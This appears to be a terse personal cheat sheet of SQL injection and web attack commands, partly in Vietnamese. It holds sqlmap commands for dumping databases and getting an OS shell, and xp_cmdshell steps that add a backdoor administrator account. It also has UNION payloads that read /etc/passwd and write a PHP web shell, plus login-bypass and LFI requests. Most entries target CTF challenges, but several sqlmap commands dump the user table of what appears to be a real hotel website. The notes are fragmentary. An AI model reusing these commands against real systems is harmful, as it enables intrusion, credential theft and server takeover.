SQSH
#Login sqsh -S : -U sa -P password
exec xp_cmdshell 'whoami' go exec xp_cmdshell 'net user kalisa pass /add' go exec xp_cmdshell 'net localgroup Administrators kalisa /add' go exec xp_cmdshell 'net localgroup "Remote Desktop Users" kalisa /add' go
SQLMAP
sqlmap -u http:// --crawl=1 sqlmap -u http:// --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3
sqlmap –u http:///index.php?par= –dbs
sqlmap –u http:///index.php?par= –dbs –D dbname –tables –-dump sqlmap –u http:///index.php?par= –dbs –D dbname –T tablename –-dump
sqlmap -u http:///comment.php?id=738 --dbms=mysql --osshell
Manual sql injection commands
?id=1'
?id=1 order by 9 -- -
?id=1 union select 1,2,3,4,5,6,7,8,9 -- -
?id=1 union select 1,2,3,4,user(),6,7,8,9 -- -
?id=1 union select 1,2,3,4,version(),6,7,8,9 -- -
?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables -- -
?id=1 union select 1,2,3,4,column_name,6,7,8,9 from information_schema.columns where table_name = 'users' -- -
Get content from the users-table. From columns name and password. (The 0x3a only servers to create a delimiter between name and password)
?id=1 union select 1,2,3,4,concat(name,0x3a,password),6,7,8,9 FROM users
?id=1 union select 1,2,3,4, load_file('/etc/passwd') ,6,7,8,9 -- - ?id=1 union select 1,2,3,4, load_file('/var/www/login.php') ,6,7,8,9 -- -
?id=1 union select 1,2,3,4,'this is a test message' ,6,7,8,9 into outfile '/var/www/test' -- - ?id=1 union select 1,2,3,4, load_file('/var/www/test') ,6,7,8,9 -- -
?id=1 union select null,null,null,null,'' ,6,7,8,9 into outfile '/var/www/shell.php' -- - ?id=1 union select null,null,null,null, load_file('/var/www/shell.php') ,6,7,8,9 -- -
http:///shell.php?cmd=id
Sql: Fillter dấu trong Sql "=,-,*" admin' or '2' > '1
Sql Truncation admin sugi anything
LDAP user: admin pass: *
Po po po po postgresql '))OR TRUE
Area 51 .htaccess
curl -vv --cookie "PHPSESSID=5u5sonir2saqrdcn92bms31gd0" -X PUT https://ringzer0team.com/challenges/48 --ssl --insecure |grep "FLAG" Security through obscurity!
YWRtaW4sYThmMTBmMWNlNGUxZjQ0YywxNDcxNjk1MTMyLHRydWU6OWVjNjRlYTE5NzlkNTc0ZWVjMDYzZGQzYmFlYmRlNTE=
admin,a8f10f1ce4e1f44c,1471695132,true=MD5 :9ec64ea1979d574eec063dd3baebde51
sqlmap -u "http://web.challenges.pwnerrank.com/e5f3efcceb11226e71a6bc5317cf0df6/?password=a" -v 3 --dbs -D web5 -T flag --dump
sqlmap -u "https://www.hotelelsalvador.net/en/hotel-offer.php?&id=9" --tables -D information_schema sqlmap -u "https://www.hotelelsalvador.net/en/hotel-offer.php?&id=9" --columns -D Sql436940_3 -T user sqlmap -u "https://www.hotelelsalvador.net/en/hotel-offer.php?&id=9" --dump -D Sql436940_3 -T user Blind SQl sqlmap -u https://xxx.com//Default.aspx/verify --data "{"ghi_nho":false,"mat_khau":"abc","ten_dang_nhap":"e"}" --random-agent -p mat_khau Sniper GET /e5f3efcceb11226e71a6bc5317cf0df6/?password=admin%27%20having%20(substr(flag,6,1))%20=%20%27§§%27%20%20--%20- HTTP/1.1 Host: web.challenges.pwnerrank.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: _ga=GA1.2.487678829.1472609687 Connection: keep-alive Upgrade-Insecure-Requests: 1
_ 1 ki tu bat ki % tuong ung' nhieu ki tu bat ki
Select * From Book Where bookname Like 'a%'
LFI GET /?page=php: HTTP/1.1 Host: globalpage.chal.ctf.westerns.tokyo Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: /filter/convert.base64-encode/resource=flag Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1